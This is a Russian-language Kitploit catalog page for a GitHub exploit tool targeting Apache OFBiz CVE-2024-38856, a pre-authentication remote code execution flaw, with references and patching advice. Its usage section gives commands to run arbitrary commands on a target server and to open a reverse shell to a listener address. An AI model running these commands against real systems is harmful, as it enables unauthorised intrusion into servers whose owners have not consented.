Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Apache-OFBiz-Exploit — Эксплойт для Apache OFBiz - CVE-2024-38856 | Kitploit
Инструменты/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Эксплойт для Apache OFBiz - CVE-2024-38856

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Apache-OFBiz-Exploit

Эксплойт для Apache OFBiz (CVE-2024-38856) Автор: Alisson Faoli

Описание

Этот репозиторий содержит эксплойт для уязвимости CVE-2024-38856, обнаруженной в Apache OFBiz. Уязвимость позволяет выполнить удаленный код без аутентификации (RCE).

Примечание: Данный эксплойт предоставляется только в образовательных и исследовательских целях. Неправильное использование может быть незаконным и является исключительной ответственностью пользователя.

Детали уязвимости

CVE: CVE-2024-38856

Затронутое ПО: Apache OFBiz до версии 18.12.14

Тип уязвимости: RCE

Эксплуатация: Аутентификация не требуется

Ссылки:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Использование

Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

Установите зависимости:

root@kitploit:~
pip install -r requirements.txt

Запустите эксплойт:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Устранение

Для устранения этой уязвимости рекомендуется администраторам Apache OFBiz: Обновиться до исправленной версии, доступной по адресу https://ofbiz.apache.org/download.html. Применить правила межсетевого экрана или WAF для блокировки известных попыток эксплуатации.

Контакты

Если у вас есть вопросы или вы хотите сообщить об улучшении эксплойта, свяжитесь со мной: LinkedIn: https://linkedin.com/in/alisson-faoli/

Правовое предупреждение:

Этот код предоставляется исключительно для образовательных целей и тестирования безопасности в авторизованных средах. Автор не несет ответственности за любое неправомерное использование.

Скачать инструмент